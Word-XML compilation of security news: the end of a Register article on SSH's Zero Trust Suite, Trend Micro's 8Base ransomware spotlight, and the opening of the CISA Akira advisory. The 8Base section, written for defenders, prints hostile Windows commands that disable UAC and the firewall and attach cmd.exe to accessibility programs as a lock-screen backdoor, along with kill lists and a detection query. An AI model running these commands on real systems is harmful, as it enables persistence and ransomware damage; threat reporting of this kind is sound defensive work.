monitored, and in case of anomalies (such as anti-virus going offline), is also automatically terminated.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Customer use cases and UKM show worth</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PrivX is currently used by customers across a variety of industry verticals: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A Fortune 500 company used it to manage secure access for admins and DevOps to its large Kubernetes container environment without the risk associated with traditional credentials and keys. Built on microservices, like the Kubernetes environment itself, PrivX was able to meet the high- performance and scalability requirements set by the customer. With an agentless deployment, the solution also ensured a zero touch environment without the customer having to change the configurations of production scripts or targets.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A telecom company used it to enable secure access to its network by multiple third-party service providers (static credentials would have created a risk of password sharing or compromise for accounts with high privileges). An added advantage was PrivX's simple integration with an existing Windows Active Directory (AD) for authorization and access control.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PrivX includes the ability to manage SSH keys centrally alongside other credentials, some customers require dedicated SSH management, particularly within the context of machine-to-machine and test-to- production connectivity. That's where the second module - the Universal SSH Key Manager (UKM) - comes into play.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UKM allows customers to uncover SSH keys of all types in their environment, create a policy report of compliance, remedy to ensure key management complies with local regulations and best practice (ie the NIST framework), and automatically rotate these when they reach a given age. As with PrivX, the UKM allows migration for an entirely keyless access with just-in-time authentication, and integrates with AD and IAMs such as Entra ID (formerly Azure AD) via SAML 2.0.</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UKM's features include the ability to scan SSH keys for encryption schemes that might be vulnerable to future quantum computers. Through this, organizations can discover which algorithms they are using currently will need to be replaced with quantum-safe post-quantum cryptography (PQC) equivalents over time. This might sound like a worry for the future but the rapid maturing of PQC algorithms under NIST suggests the issue of quantum- safe migration should be assessed as soon as possible.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Overcoming email data security weaknesses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SSH Secure Collaboration is a suite of applications designed to overcome the data security weaknesses that arise from using email, video conferencing and instant messaging applications to share data between employees or with customers. The obvious use case for this is in regulated environments where data exchange is tightly controlled. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Customers can access a secure application where conventional email or IM would be too risky, with all data stored in encrypted form while at rest or in transit. All communication can be verified with digital signing to ensure document integrity, and there's a solid audit trail of activities to help organizations avoid the fate of the Wall Street companies which were fined for not following the record-keeping requirements.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Tectia is a secure remote access and file transfer/secure tunneling tool for moving data between machines using SFTP or SCP, eliminating static credentials and identities in favor of role-based access control (RBAC). The latter allows organizations to adhere to the principle of zero trust. Use cases include exchanging patient data in healthcare in a compliant way, secure software distribution, and sending and receiving orders or quotes in manufacturing.</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Where organizations in highly sensitive environments are concerned about the threat posed by quantum computers, a separate Quantum-Safe Edition implements post-quantum cryptography (PQC) to resist attacks, including that public-key encrypted data might be stolen today and stored until a quantum device able to decrypt it becomes available (the uncomfortably plausible 'download now, decrypt later' scenario).</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biggest problem with zero trust is that it is a security principle - trust nothing - rather than a defined technology. It tells people what to do but not how to do it. What's clear is that the assumed trust of traditional password credentials and security perimeters no longer cuts it. This is a difficult message to deliver; simply abandoning passwords is challenging and, in some cases, impossible. Authentication happens in so many ways today that organizations need multiple systems for different contexts. This is perhaps the biggest promise of Zero Trust Suite, namely that complex security requirements can be managed through a single access management system that offers a unique set of applications for securing communications between humans, systems, applications and networks.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by SSH Communications Security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Register 2024.04.29 05:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.theregister.co.uk/2024/04/29/the_next_step_up_for/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ransomware Spotlight: 8Base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April 25, 2024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X</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8Base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Trend Research</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Despite positioning themselves as penetration testers, 8Base ransomware threat actors profit off their victims that are significantly comprised of small businesses. In this feature, we investigate how the gang operates to gain insights on how organizations can protect systems better from compromises that could result in financial loss.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infographic of "Ransomware Spotlight: 8Base"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First detected in March 2022, 8Base is an active ransomware group that positions itself as "simple penetration testers" to justify its double- extortion strategy, which involves encrypting data and threatening to expose sensitive information. The gang adopts a name-and-shame tactic, claiming in its leak site to exclusively target organizations that "have neglected the privacy and importance of the data of their employees and customers" and revealing confidential data to potentially cause harm to its victim's brand and reputation. What organizations need to know about 8Base ransomware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Despite branding itself as "pen testers," the 8Base gang is financially motivated. In October 2023, it targeted healthcare and public health sector organizations in the United States, prompting the Health Sector Cybersecurity Coordination Center (HC3) to publish an analyst note about the group.</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8Base also drew attention for its similarities with the RansomHouse ransomware with regard to ransom notes and copies it used in its leak sites. The 8Base ransomware also makes use of the Phobos ransomware version 2.9.1, which uses SmokeLoader for initial obfuscation for ingress, unpacking, and loading of the payload.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8Base ransomware primarilygains initial access throughphishing emails, but samples of the ransomware have been observed as having been downloaded from domains that appear to be associated with SystemBC, a proxy and remote administration tool (RAT).8Base was also found to be using a batch file named defoff.bat (detected as KILLAV) to disable components of Windows Defender and to allowlistthe malware path through Windows Management Instrumentation command-line (WMIC).</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September 2023, an 8Base leak site duplicate was discovered on the darknet, reportedly associated with a group known as CryptBB; however, 8Base denied the association and asserted that the duplicate site was an imitation. In the same month, the 8Base group unintentionally leaked some information about its leak website, linking the website to a private GitLab server called Jcube-group.</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Top affected countries and industries according to Trend Micro threat intelligence data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Based on Trend threat intelligence data, there were 224 attack attempts by 8Base in 2023, with the gang's criminal activity against Trend customers peaking in March.</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 A monthly breakdown of 8Base ransomware attack attempts in terms of infected machines (January 2023 - March 2024). Note that there were no detections in our threat intelligence data for the first quarter of 2024.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Organizations in the manufacturing industry were targeted the most by 8Base ransomware, while companies in the technology industry were also largely targeted. Beyond the top five industries specified in Figure 2, organizations in healthcare, oil and gas industries, and the government were also targeted by 8Base. It should be noted that the data in Figure 2 covers Trend Micro customers who have chosen to provide information on the industry they belong to.</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2. A monthly breakdown of 8Base ransomware attack attempts in terms of infected machines (January - December 2023)</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Meanwhile, Trend threat intelligence showed that the 8Base ransomware targeted America the most with 71 infected machine detections from January 2023 to March 2024 data. Curiously, threat actors behind the ransomware also targeted the small western European country of the Netherlands with 35 detections. Vietnam, Israel, and the United Kingdom were also in the gang's top targeted countries.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3. The top five countries targeted by the 8Base ransomware group in terms of infected machines (January - March 2024)Targeted regions and industries according to 8Base ransomware's leak site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section looks at data based on attacks recorded on the leak site of the 8Base ransomware from May 2023 to March 2024.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Based on a combination of our open-source intelligence (OSINT) research and an investigation of the leak site, the 8Base ransomware gang targeted organizations in North America the most, while also spending significant time on European corporations.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4. The distribution by region of 8Base ransomware's victim organizations Source: 8Base ransomware's leak site data and Trend Micro's OSINT research (May 2023 - March 2024)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closer look shows that the gang's efforts were significantly focused on American organizations, but it also targeted Brazilian institutions as well as those from the United Kingdom, France, Canada, and Australia.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Interestingly, 8Base ransomware also targeted smaller countries such as Costa Rica, Croatia, and the Bahamas.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5. The top five countries targeted by 8Base ransomware Source: 8Base ransomware's leak site data and Trend Micro's OSINT research (May 2023 - March 2024)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Threat actors behind 8Base ransomware targeted a wide range of sectors including real estate businesses, legal services companies, and hospitality- related establishments. However, they focused their efforts the most on businesses in the manufacturing and finance sectors.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6. The top 5 sectors targeted by 8Base ransomware Source: 8Base ransomware's leak site data and Trend Micro's OSINT research (May 2023 - March 2024)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8Base ransomware targeted small business the most, despite or perhaps because the gang positioned themselves as pen testers; penetration testing usually aims to identify weak spots in a system's defenses that can be taken advantage of by attackers. It could be assumed that instead of big corporations, the gang targeted small business to teach them a "lesson" while also gaining profit.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7. The distribution by organization size of the 8Base ransomware victims Source: 8Base ransomware's leak site data and Trend Micro's OSINT research (May 2023 - March 2024)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Infection chain and techniques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Initial Access The 8Base ransomware primarily uses phishing scams for initial access.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Credential Access 8Base operators use MIMIKATZ, LaZagne, WebBrowserPassView, VNCPassView, PasswordFox, and ProcDump to retrieve passwords and credentials on their victim's machines.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Defense Evasion For its defense evasion, the 8Base ransomware drops and executes a batch file named defoff.bat detected as KILLAV to disable components of Windows Defender.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The 8Base ransomware also uses garbage codes, deletes shadow copies, bypasses Cuckoo Sandbox, clears Windows event logs, disables firewalls, and uses SmokeLoader to decrypt and deliver the payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>8Base operators also uses other tools such as PCHunter, GMER, and Process Hacker.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Lateral Movement It has been observed that the 8Base ransomware operators use PsExec to deploy the batch file as well as the ransomware binary.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Privilege Escalation 8Base ransomware operators modified certain registry entries to bypass User Access Control (UAC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>They also modified IFEO registry keys to attach cmd.exe to accessibility programs that are accessible from the lock screen.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Exfiltration The threat actors behind 8Base ransomware have been detected using the third-party tool and web-service RClone to exfiltrate stolen information.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Impact The 8Base ransomware uses AES-256 algorithm to encrypt target files and then encrypts the encryption key using RSA-1024 with a hardcoded public key appended to the end of each encrypted file. It has an embedded configuration, decrypted during runtime, which contains the file extensions, file names, and folders to avoid.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drops the following ransom notes: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Additional information The 8Base ransomware terminates the following processes to avoid conflict in its encryption routine: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msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe oracle.exe ocssd.exe dbsnmp.exe synctime.exe agntsvc.exe mydesktopqos.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe msaccess.exe mspub.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>onenote.exe outlook.exe powerpnt.exe steam.exe thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe wordpad.exe 8Base ransomware avoids encrypting files with the following extensions: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8base actin dike acton actor acuff file acuna fullz mmxxii 6y8dghklp shtorm nurri ghost ff6om6 mnx backjohn own fs23 2qz3 top blackrock chcrbo g-stars faust unknown steel worry win duck fopra unique acute adage make adair mlf magic adame banhu banjo banks banta barak caleb cales caley calix calle calum calvo deuce dever devil devoe devon devos dewar eight eject eking elbie elbow elder phobos help blend bqux com mamba karlos ddos phoenix plut karma bbc capital wallet lks tech s1g2n3a4l murk makop ebaka jook logan fiasko gucci decrypt ooh non grt lizard flscrypt sdk 2023 vhdv fdb sql 4dd 4dl abs abx accdb accdc accde adb adf ckp db db-journal db-shm db-wal db2 db3 dbc dbf dbs dbt dbv dcb dp1 eco edb epim fcd gdb mdb mdf ldf myd ndf nwdb nyf sqlitedb sqlite3 sqlite 8Base ransomware avoids encrypting files with the following strings: :</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info.hta info.txt boot.ini bootfont.bin ntldr ntdetect.com io.sys suppo bin.exe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MITRE tactics and techniques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Initial AccessPersistencePrivilege EscalationDefense EvasionDiscoveryImpact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T1566 - Phishing: Based on reports, 8Base ransomware gains initial access primarily through phishing emails. Once the victim engages with the phishing elements, an exploit kit will be executed.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T1547.001 - Registry Run Keys / Startup Folder: It creates the following registry entries for its autorun technique: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 HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Run o {malware name} = %AppDataLocal%\{malware name}.exe o HKEY_CURRENT_USER\ Software\Microsoft\Windows\ CurrentVersion\Run o {malware name} = %AppDataLocal%\{malware name}.exe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also drops a copy of itself on the %User Startup% folder.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T1134.001 - Token Impersonation/Theft If the system OS version is &gt; 6, it duplicates the token of explorer.exe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T1134.002 - Create Process with Token 8Base ransomware then creates a process using the API CreateProcessWithTokenW and the duped token of explorer.exe.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T1548.002 - Bypass User Account Control It adds registry entries to bypass User Access Control (UAC)</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 ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f o ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f o o ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f</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T1546.008 - Accessibility Features It modifies the following IFEO registry keys to attach cmd.exe to accessibility programs that are accessible from the lock screen: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 HelpPane.exe - ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe" o utilman.exe - ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe" o Magnify.exe - ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe" o sethc.exe - ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"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T1027.001 - Binary Padding 8Base ransomware uses garbage codes to make analysis difficult and confusing.</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T1497.001 - System Checks It uses SetErrorMode function to bypass Cuckoo Sandbox by terminating the process if the return value is 0x400.</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T1562.004 - Disable or Modify System Firewall It executes the following to disable firewall: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 netsh advfirewall set currentprofile state off o o netsh firewall set opmode mode=disable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T1140 - Deobfuscate / Decode Files or Information It uses SmokeLoader to decrypt and deliver the 8Base ransomware payload.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T1070.001 - Clear Windows Event Logs Using wevtutil.exe, it clears Windows event logs.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T1083 - File and Directory Discovery It enumerates and looks for files to encrypt in all local drives.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It contains a specific list of extensions and folders that it can use to verify which files to avoid encrypting (this can be found in the "Infection chain and techniques" section).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T1082 - System Information Discovery It obtains the OS major version to check if it is &lt; 6 This ransomware also retrieves the volume serial number which will be used in generating the file extension that it will append on encrypted files.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T1135 - Network Share Discovery It uses WNetEnumResource() to crawl network resources.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T1057 - Process Discovery This ransomware enumerates processes for the purpose of terminating them to avoid conflict in its encryption routine. See the list of processes it terminates in the additional information provided at the end of the article.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T1486 - Data Encrypted for Impact It uses AES-256 to encrypt target files and then encrypts the encryption key used using RSA-1024 with a hardcoded public key appended to the end of each encrypted file. It has an embedded configuration, decrypted during runtime, which contains the file extensions, file names, and folders to avoid. It avoids encrypting certain files. See the list of extensions it avoids encrypting in the additional information provided in the "Infection Chain and techniques" section.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It avoids encrypting files with the certain strings in their file name. See the full list in the additional information provided at the end of the article.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It avoids encrypting files found in the following folders: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 c:\windows o c:\programdata\microsoft\windows\caches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appends the following file extension to encrypted files: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 id[{Volume Serial Number}-{Generated ID}].support@rexsdata.pro].8base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drops the following ransom notes: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 %Desktop%\info.txt o %Desktop%\info.hta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T1490 - Inhibit System Recovery It uses Vssadmin, WMIC, BCDEdit, and wbadmin to remove volume shadow copies.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T1218.005 - System Binary Proxy Execution: Mshta It executes the following command to display the ransom note after encryption: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 %System%\mshta.exe %Desktop%\info.hta Summary of malware, tools, and exploits used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Initial Access Phishing Technique Credential Access Mimikatz Hacktool LaZagne Hacktool WebBrowserPassView Hacktool VNCPassView Hacktool PasswordFox Hacktool ProcDump Tool Lateral Movement PsExec Tool SystemBC Tool Defense Evasion KILLAV Malware SmokeLoader Malware PCHunter Tool GMER Tool Process Hacker Tool Exflitration RClone Tool Impact Phobos Ransomware Malware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Security recommendations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"p&gt;While the threat actors behind the 8Base ransomware position themselves as penetration testers, their attacks on organizations cannot be seen as a "public service," since the group extorts and profits off its victims. Organizations should conduct their own penetration tests and find out weaknesses in their systems before cybercriminals can take advantage of them in the guise of teaching lessons in security. As evidenced in the profile of 8Base ransomware's victims, no business is too small for a robust and comprehensive security system.</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 shield themselves against 8Base ransomware and other similar threats, organizations can implement security frameworks that allocate resources systematically to establish a strong defense strategy.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following are some best practices that organizations can consider to safeguard themselves from ransomware infections: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Audit and inventory Take an inventory of assets and data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify authorized and unauthorized devices and software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Make an audit of event and incident logs.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Configure and monitor Manage hardware and software configurations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Grant admin privileges and access only when necessary to an employee's role. Monitor network ports, protocols, and services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Activate security configurations on network infrastructure devices such as firewalls and routers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish a software allowlist that executes only legitimate applications.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Patch and update Conduct regular vulnerability assessments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform patching or virtual patching for operating systems and applications. Update software and applications to their latest versions.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Protect and recover Implement data protection, backup, and recovery measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable multifactor authentication (MFA).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Secure and defend Employ sandbox analysis to block malicious emails.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detect early signs of an attack such as the presence of suspicious tools in the system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use advanced detection technologies such as those powered by artificial intelligence (AI) and machine learning.</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Train and test Regularly train and assess employees in security skills.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct red-team exercises and penetration tests.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multilayered approach can help organizations guard possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can also help protect enterprises.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Cloud OneTM Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning. Trend MicroTM Deep DiscoveryTM Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware. Trend Micro Apex OneTM offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.Indicators of compromise (IOCs)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IOCs for the threat discussed in this article can be found here. Actual indicators might vary per attack.Trend Vision One Hunting Query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 Vision One customers can use the following hunting query to search for 8Base ransomware within their system:</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fullPath:"*.8base" OR fullPath:"*.eight" OR fullPath:"*\\info.hta" OR fullPath:"*\\info.txt" OR (processFilePath:"*\\mshta.exe" AND objectFilePath:"*\\info.hta")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Posted in Ransomware Spotlight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.04.25 12:12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-8base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: Akira Ransomware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Release Date April 18, 2024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Alert Code AA24-109A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Cybersecurity Best Practices, Cyber Threats and Advisories, Incident Detection, Response, and Prevention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Actions to take today to mitigate cyber threats from Akira ransomware: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Prioritize remediating known exploited vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly patch and update software and applications to their latest version and conduct regular vulnerability assessments.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SUMMARY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Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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United States' Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.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Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.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Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.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FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.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Download the PDF version of this report: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#StopRansomware: Akira Ransomware (PDF, 586.86 KB ) TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK(R) for Enterprise framework, version 14. See MITRE ATT&amp;CK for Enterprise for all referenced tactics and techniques. Initial Access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FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023- 20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials[T1078].[4] Persistence and Discovery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Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm.</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FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) 